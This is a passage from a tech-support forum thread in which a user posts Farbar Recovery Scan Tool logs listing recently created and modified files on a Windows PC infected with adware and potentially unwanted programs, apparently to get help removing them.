    2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
    2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
    2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
    2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
    2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
    2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
    2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
    2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
    2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
    2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
    2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
    2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
    2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
    2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
    2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
    2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
    2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
    2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
    2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
    2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
    2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
    2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
    2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
    2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
    2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
    2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
    2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
    2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
    2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
    2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
    2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
    2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
    2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
    2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
    2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
    2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
    2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
    2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
    2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
    2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
    2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
    2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
    2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
    2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
    2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
    2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
    2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
    2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
    2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
    2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
    2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
    2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
    2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
    2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
    2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
    2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
    2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
    2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
    2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
    2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
    2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
    2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
    2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
    2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
    2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
    2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
    2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
    2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
    2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
    2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
    2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
    2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
    2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
    2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
    2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
    2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
    2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
    2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
    2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
     
  25. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
    2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
    2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
    2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
    2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
    2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
    2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
    2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
    2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
    2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
    2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
    2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
    2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
    2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
    2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
    2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
    2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
    2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
    2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
    2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
    2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
    2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
    2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
    2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
    2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
    2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
    2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
    2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
    2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
    2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
    2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
    2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
    2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
    2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
    2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
    2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
    2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

    ==================== Files in the root of some directories =======

    2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
    2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
    2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
    2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
    2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
    2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


    Some files in TEMP:
    ====================
    C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
    C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
    C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
    C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
    C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
    C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
    C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
    C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
    C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
    C:\Users\owner\AppData\Local\Temp\amzngtb.exe
    C:\Users\owner\AppData\Local\Temp\avg6A34.exe
    C:\Users\owner\AppData\Local\Temp\avgE955.exe
    C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
    C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
    C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
    C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
    C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
    C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
    C:\Users\owner\AppData\Local\Temp\nsz1850.exe
    C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
    C:\Users\owner\AppData\Local\Temp\setup_766.exe
    C:\Users\owner\AppData\Local\Temp\SpOrder.dll
    C:\Users\owner\AppData\Local\Temp\TranDex.exe
    C:\Users\owner\AppData\Local\Temp\Uninstall.exe
    C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
    C:\Users\owner\AppData\Local\Temp\Vivafind.exe
    C:\Users\owner\AppData\Local\Temp\Voldom.exe
    C:\Users\owner\AppData\Local\Temp\widgett.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
